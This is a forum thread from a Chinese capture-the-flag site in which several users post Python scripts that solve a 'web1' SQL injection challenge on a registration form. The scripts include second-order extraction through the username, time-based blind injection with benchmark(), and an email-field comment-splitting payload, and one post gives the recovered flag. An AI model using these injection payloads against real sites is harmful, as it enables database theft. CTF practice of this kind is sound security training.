web1_签到
y1ngy1ngy1ng
import requests
import re
# Solution script for the "web1" sign-in challenge (see the thread title).
# What it exercises: the registration form's username value is apparently
# concatenated into SQL, so the submitted expression is evaluated by the
# database and its result is what ends up stored as the username; the
# stored value is then read back from /user.php (L24-L26). Application-side
# fix is a parameterised INSERT — output escaping on the profile page does
# not help, because the expression runs inside the database.
# NOTE(review): the forum rendering stripped indentation; L15-L26 are the
# body of the for loop and are shown flat here.
url = "https://3ff49635-7092-4ee3-9be9-041d0b2d629b.chall.ctf.show"  # challenge instance named in the post
register = "/register.php"
login = "/login.php"
flag = ""  # accumulates the digit chunks read back from /user.php
e = 0  # bumped per round so every registration uses a fresh e-mail address
# test{}@66.com
# 0'+(select substr(hex(hex((select * from flag))) from {} for 10))+'0
for i in range(1,1000,10):  # i is the 1-based offset into the double-hexed value, 10 characters per round
s = requests.Session()  # fresh session per round so the login cookie belongs to this round's user
data = {"e": "", "u": "", "p": "test"}
data["e"] = str(e)+"@aa.com"
e += 1
data["u"] = "0'+(select/**/substr(hex(hex((select/**/*/**/from/**/flag)))/**/from/**/{}/**/for/**/10))+'0".format(i)
s.post(url=url+register,data=data)
del data['u']  # the login form only takes e-mail and password
s.post(url=url + login, data=data).text  # response body is discarded; only the session cookie matters
# print(s.post(url=url+login,data=data).text)
text = s.get(url+"/user.php").text
# print(text)
# hex(hex(...)) of printable ASCII consists of decimal digits only
# (compare the sample string on the comment line below), hence the digit-only regex.
flag += re.search("[0-9]{7,10}", text).group()
print(flag)
# 666C61677B65323935343837662D313362392D343665392D626338632D3530303830336435303234307D
# hex-decode twice to obtain flag{e295487f-13b9-46e9-bc8c-500803d50240}
y1ngy1ngy1ng
[网鼎杯2018]Unfinish 差不多的题
admin
对的,题目作为签到练手题,大佬牛皮
cop
借楼交流一下另一种解法
import requests
import time
# Alternative solution: time-based blind extraction through the same
# registration form. Each request embeds a comparison of one character's
# ordinal against a guess; when the comparison is false the database runs
# benchmark(), and the elapsed time at L70/L75 is what the script reads.
# Defender's view: such payloads show up as anomalous latency on the
# registration endpoint and as benchmark()/sleep() calls in query logs;
# the fix is a parameterised INSERT, not input filtering.
# NOTE(review): the forum rendering stripped indentation; L42-L79 are the
# body of the outer for loop and L46-L78 the body of the inner one.
i=1
n=2  # 2 = "no timing result yet"; later 1 = last request was fast, 0 = last request was slow
flag=""
for i in range(42,44):  # character positions (1-based) extracted in this run
print(i)
m=64  # current guess for the character's ordinal; starts at the midpoint of 0..128
j=64  # step size; halved each round, giving a 7-round binary search
for q in range(1,8):
if q!=1:
j=j/2
if n==1:
m=m+j
elif n==0:
m=m-j
m=int(m)  # j becomes a float after the division; the payload needs an integer
#exp="0'/**/or/**/(select/**/case/**/when(ord(substr((select/**/group_concat(table_name)from/**/information_schema.tables/**/where/**/table_schema=database()),{},1))>{})then(1)else(benchmark(5000000,sha(1)))end)/**/or/**/'0".format(i,m)
#flag
#exp="0'/**/or/**/(select/**/case/**/when(ord(substr((select/**/group_concat(column_name)from/**/information_schema.columns/**/where/**/table_name='flag'),{},1))>{})then(1)else(benchmark(5000000,sha(1)))end)/**/or/**/'0".format(i,m)
#flag
exp="0'/**/or/**/(select/**/case/**/when(ord(substr((select/**/group_concat(flag)from/**/flag),{},1))>{})then(1)else(benchmark(5000000,sha(1)))end)/**/or/**/'0".format(i,m)
#exp="or if(ascii(substr(username,{},1)) > {},1,sleep(2))#".format(i,m)
data={"e":"cop\x40qq.com",
"u":exp,
"p":"123456"
}
url="https://fb01744a-0f92-44b7-8f74-fcaf576c1836.chall.ctf.show/register.php"  # challenge instance named in the post
startTime=time.time()
p=requests.post(url,data=data,timeout=100)  # generous timeout so a slow (benchmark) response is still measured rather than raised
#print(p.status_code)
print(m)
#print(exp)
#print(time.time()-startTime)
if time.time()-startTime<2:  # fast response => comparison was true => ordinal is above the guess
n=1
else:
n=0
if q==7:  # last round: resolve the final guess into a character
if time.time()-startTime<2:
flag=flag+chr(m+1)
else:
flag=flag+chr(m)
print(flag)
cop
_yu_
import requests
import re
# Third solution: the e-mail field, rather than the username, carries the
# expression. The submitted e-mail closes its quoted value and supplies a
# username column value of its own (L93), while the username field (L94)
# only closes the comment opened at the end of the e-mail. One character of
# the target value is stored per registration and read back from the
# login greeting (L105). Same root cause as the other scripts: unparameterised
# INSERT on the registration form.
# NOTE(review): the forum rendering stripped indentation; L89-L107 are the
# body of the for loop.
url1 = "https://f61d3939-d164-4eb5-b3ea-9281cc8447c4.chall.ctf.show/register.php"  # challenge instance named in the post
url2 = "https://f61d3939-d164-4eb5-b3ea-9281cc8447c4.chall.ctf.show/login.php"
flag=''
for i in range(1,50):  # 1-based character position; one character per round
payload="hex(hex(substr((select/**/flag/**/from/**/flag)from/**/"+str(i)+"/**/for/**/1))),/*"
#print(payload)
s=requests.session()
data1={
'e':str(i+30)+"',username="+payload,  # i+30 doubles as the account's e-mail/password so each round registers a distinct user
'u':"*/#",
'p':i+30
}
#print(data1['e'])
r1 = s.post(url1,data=data1)
data2={
'e':i+30,
'p':i+30
}
r2=s.post(url2,data=data2)
t =r2.text
real = re.findall("Hello (.*?),",t)[0]  # the login page greets the user by the stored username
flag+=real
print(flag)
y1ngy1ngy1ng
_yu_ 羽师傅tql
yuchoxuuan
大佬们太强了,我是一位一位出的,把自己蠢哭
def web1():
"""Fetch the challenge value one character per registration.

Each call to ``check`` registers a user whose username expression yields
the ordinal of one character, logs in as that user and prints the
character recovered from the greeting. Same root cause as the other
scripts in the thread: the registration form builds SQL from the
submitted username.
"""
# NOTE(review): the forum rendering stripped indentation; ``check`` is
# nested inside ``web1`` and L117-L124 form its body.
# NOTE(review): ``hf`` is not defined in this snippet — presumably an HTTP
# helper whose ``post(url, data)`` returns the response body as a string
# (``txt.index`` below relies on that); confirm against the author's helper.
u='https://07072526-0de4-4111-bc00-b7db08462871.chall.ctf.show/'  # challenge instance named in the post
ur=u+'register.php'
ul=u+'login.php'
def check(i = 1):
"""Register, log in and print the character at 1-based position ``i``."""
un = 'gues@%d'%i  # distinct e-mail per position so every round creates a fresh account
pl={'e':un,
'u':"0'+(select/**/ord(substr(flag,%d,1))from/**/flag)+'0"%i,
'p':'1'}
hf.post(ur,pl)
txt = hf.post(ul,pl)
# the greeting is "Hello <username>," — slice out the stored numeric value
co= txt[txt.index('Hello ')+len('Hello '):txt.index(',')]
print(chr(int(co,base=10)),end='')
for r in range(0,48):
check(r+1)
y1ngy1ngy1ng
yuchoxuuan 羽师傅的一下就出了 tql
yuchoxuuan
y1ngy1ngy1ng
所以说我把自己蠢哭了啊。。。羽师傅太强了
langzi
yuchoxuuan 正常的select,把查到的数据两次hex,十位十位地存入username,访问login正则出来